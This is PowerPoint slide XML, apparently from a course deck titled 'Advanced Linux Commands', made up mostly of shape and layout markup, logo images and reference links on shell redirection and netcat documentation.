        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882774" y="6215517"/>
            <a:ext cx="600733" cy="744979"/>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6" name="Google Shape;196;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5291768" y="5333718"/>
            <a:ext cx="591013" cy="672893"/>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7" name="Google Shape;197;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377819" y="5612687"/>
            <a:ext cx="280284" cy="611852"/>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8" name="Google Shape;198;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7662081" y="5390448"/>
            <a:ext cx="552209" cy="677016"/>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9" name="Google Shape;199;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9418147" y="5509371"/>
            <a:ext cx="609091" cy="567451"/>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0" name="Google Shape;200;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11657298" y="5555569"/>
            <a:ext cx="660375" cy="453651"/>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1" name="Google Shape;201;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8775356" y="5388321"/>
            <a:ext cx="496691" cy="513331"/>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2" name="Google Shape;202;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8676176" y="6045283"/>
            <a:ext cx="695056" cy="718656"/>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3" name="Google Shape;203;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7334739" y="6076801"/>
            <a:ext cx="672893" cy="534169"/>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4" name="Google Shape;204;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935423" y="5434132"/>
            <a:ext cx="627093" cy="589613"/>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5" name="Google Shape;205;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354112" y="5434125"/>
            <a:ext cx="452803" cy="534156"/>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6" name="Google Shape;206;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7362478" y="6664025"/>
            <a:ext cx="617412" cy="237283"/>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7" name="Google Shape;207;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10736763" y="6433681"/>
            <a:ext cx="786656" cy="552172"/>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8" name="Google Shape;208;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10736769" y="5372369"/>
            <a:ext cx="517491" cy="545251"/>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9" name="Google Shape;209;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9312764" y="6600511"/>
            <a:ext cx="396808" cy="28164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0" name="Google Shape;210;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11666301" y="6600167"/>
            <a:ext cx="384327" cy="245603"/>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1" name="Google Shape;211;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214287" y="6373645"/>
            <a:ext cx="431488" cy="428728"/>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2" name="Google Shape;212;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11363259" y="5333706"/>
            <a:ext cx="409288" cy="513369"/>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3" name="Google Shape;213;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522965" y="6070569"/>
            <a:ext cx="554971" cy="546651"/>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4" name="Google Shape;214;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11772537" y="6111825"/>
            <a:ext cx="521651" cy="385727"/>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5" name="Google Shape;215;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5985573" y="5608925"/>
            <a:ext cx="240044" cy="498052"/>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6" name="Google Shape;216;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="9648968" y="6210900"/>
            <a:ext cx="668696" cy="567409"/>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7" name="Google Shape;217;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11017723" y="6023741"/>
            <a:ext cx="639575" cy="452289"/>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8" name="Google Shape;218;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="10245807" y="5309640"/>
            <a:ext cx="373208" cy="477288"/>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9" name="Google Shape;219;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212864" y="5826928"/>
            <a:ext cx="503611" cy="568851"/>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0" name="Google Shape;220;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6746084" y="6610610"/>
            <a:ext cx="514731" cy="344087"/>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1" name="Google Shape;221;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10376560" y="6513509"/>
            <a:ext cx="233123" cy="249763"/>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2" name="Google Shape;222;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1977021" y="5612687"/>
            <a:ext cx="280284" cy="611852"/>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3" name="Google Shape;223;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261281" y="5390448"/>
            <a:ext cx="552209" cy="677016"/>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4" name="Google Shape;224;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017347" y="5509371"/>
            <a:ext cx="609091" cy="567451"/>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5" name="Google Shape;225;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374556" y="5388321"/>
            <a:ext cx="496691" cy="513331"/>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6" name="Google Shape;226;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275376" y="6045283"/>
            <a:ext cx="695056" cy="718656"/>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7" name="Google Shape;227;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933939" y="6076801"/>
            <a:ext cx="672893" cy="534169"/>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8" name="Google Shape;228;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534623" y="5434132"/>
            <a:ext cx="627093" cy="589613"/>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9" name="Google Shape;229;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-46688" y="5434125"/>
            <a:ext cx="452803" cy="534156"/>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0" name="Google Shape;230;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961678" y="6664025"/>
            <a:ext cx="617412" cy="237283"/>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1" name="Google Shape;231;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335963" y="6433681"/>
            <a:ext cx="786656" cy="552172"/>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2" name="Google Shape;232;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335971" y="5372369"/>
            <a:ext cx="517491" cy="545251"/>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3" name="Google Shape;233;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911965" y="6600511"/>
            <a:ext cx="396808" cy="28164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4" name="Google Shape;234;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265501" y="6600167"/>
            <a:ext cx="384327" cy="245603"/>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5" name="Google Shape;235;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813487" y="6373645"/>
            <a:ext cx="431488" cy="428728"/>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6" name="Google Shape;236;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962459" y="5333706"/>
            <a:ext cx="409288" cy="513369"/>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7" name="Google Shape;237;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122165" y="6070569"/>
            <a:ext cx="554971" cy="546651"/>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8" name="Google Shape;238;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371737" y="6111825"/>
            <a:ext cx="521651" cy="385727"/>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9" name="Google Shape;239;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606" y="6533642"/>
            <a:ext cx="240044" cy="498052"/>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0" name="Google Shape;240;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="3248167" y="6210900"/>
            <a:ext cx="668696" cy="567409"/>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1" name="Google Shape;241;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616923" y="6023741"/>
            <a:ext cx="639575" cy="452289"/>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2" name="Google Shape;242;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3845007" y="5309640"/>
            <a:ext cx="373208" cy="477288"/>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3" name="Google Shape;243;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3812064" y="5826928"/>
            <a:ext cx="503611" cy="568851"/>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4" name="Google Shape;244;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345284" y="6610610"/>
            <a:ext cx="514731" cy="344087"/>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5" name="Google Shape;245;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3975760" y="6513509"/>
            <a:ext cx="233123" cy="249763"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2252348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90"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="300033"/>
            <a:ext cx="8187200" cy="11432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92" name="Google Shape;292;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="1737116"/>
            <a:ext cx="8187200" cy="4814400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-516454">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2500"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="3333"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9923870" y="-121539"/>
            <a:ext cx="2395052" cy="7107432"/>
            <a:chOff x="6023725" y="842300"/>
            <a:chExt cx="1358150" cy="4030375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="294" name="Google Shape;294;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6371275" y="842300"/>
              <a:ext cx="397100" cy="492450"/>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5" name="Google Shape;295;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6991200" y="2879025"/>
              <a:ext cx="390675" cy="44480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6" name="Google Shape;296;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6244725" y="2547975"/>
              <a:ext cx="185275" cy="404450"/>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7" name="Google Shape;297;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6823375" y="1978500"/>
              <a:ext cx="365025" cy="447525"/>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8" name="Google Shape;298;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6071400" y="1791425"/>
              <a:ext cx="402625" cy="375100"/>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9" name="Google Shape;299;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6902250" y="3951050"/>
              <a:ext cx="436525" cy="299875"/>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0" name="Google Shape;300;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6405225" y="2154575"/>
              <a:ext cx="328325" cy="339325"/>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1" name="Google Shape;301;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6537275" y="2750650"/>
              <a:ext cx="459450" cy="475050"/>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2" name="Google Shape;302;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6855475" y="1544725"/>
              <a:ext cx="444800" cy="3531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3" name="Google Shape;303;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6844475" y="1037625"/>
              <a:ext cx="414525" cy="38975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4" name="Google Shape;304;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6553775" y="1840025"/>
              <a:ext cx="234775" cy="276975"/>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5" name="Google Shape;305;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6618875" y="2550725"/>
              <a:ext cx="408125" cy="156850"/>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6" name="Google Shape;306;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6336425" y="4507675"/>
              <a:ext cx="520000" cy="36500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7" name="Google Shape;307;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6425400" y="3728200"/>
              <a:ext cx="342075" cy="360425"/>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8" name="Google Shape;308;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6789450" y="3384325"/>
              <a:ext cx="262300" cy="18617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9" name="Google Shape;309;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6950850" y="4617725"/>
              <a:ext cx="254050" cy="162350"/>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0" name="Google Shape;310;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6051225" y="1090800"/>
              <a:ext cx="285225" cy="283400"/>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1" name="Google Shape;311;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6849975" y="3631900"/>
              <a:ext cx="270550" cy="339350"/>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2" name="Google Shape;312;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6351100" y="3281600"/>
              <a:ext cx="366850" cy="361350"/>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3" name="Google Shape;313;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6316250" y="3040425"/>
              <a:ext cx="137600" cy="122000"/>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4" name="Google Shape;314;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6879325" y="4294925"/>
              <a:ext cx="344825" cy="25497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5" name="Google Shape;315;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6114500" y="2324225"/>
              <a:ext cx="158675" cy="329225"/>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6" name="Google Shape;316;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6335525" y="1405350"/>
              <a:ext cx="442025" cy="375100"/>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7" name="Google Shape;317;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6059500" y="3516375"/>
              <a:ext cx="268700" cy="232025"/>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8" name="Google Shape;318;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385050" y="4208725"/>
              <a:ext cx="422775" cy="298975"/>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9" name="Google Shape;319;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7121425" y="2437925"/>
              <a:ext cx="246700" cy="315500"/>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20" name="Google Shape;320;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6062250" y="3853825"/>
              <a:ext cx="332900" cy="376025"/>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21" name="Google Shape;321;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6023725" y="3167900"/>
              <a:ext cx="340250" cy="227450"/>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22" name="Google Shape;322;p5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7109500" y="3449425"/>
              <a:ext cx="154100" cy="165100"/>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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133967" y="1375233"/>
            <a:ext cx="8050400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A4C2F4"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="120825" y="6296983"/>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l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262371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43062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99356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63717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/1/2021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85891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63717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/1/2021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7169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63717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/1/2021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60008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3717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/1/2021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9640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7/1/2021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33090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7/1/2021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48037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3717A-E3C1-4BED-ABE0-B7069385E023}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/1/2021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6F5B0-BCF1-4291-802C-4ED5F9057036}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="United States Department of Justice - Wikipedia"/>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1304663" y="6429241"/>
            <a:ext cx="379628" cy="3796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JP PMP Login"/>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1684291" y="6519834"/>
            <a:ext cx="420444" cy="2016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iversity of Baltimore Issues Marketing RFP - PR News"/>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154993" y="6286831"/>
            <a:ext cx="1571896" cy="6644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ile:Towson University logo horiz 2019.png - Wikimedia Commons"/>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1272985" y="6456351"/>
            <a:ext cx="1202235" cy="414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574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tif"/><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tif"/><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Standard_streams" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/unix/nc.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brianstorti.com/understanding-shell-script-idiom-redirec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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Linux Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6">
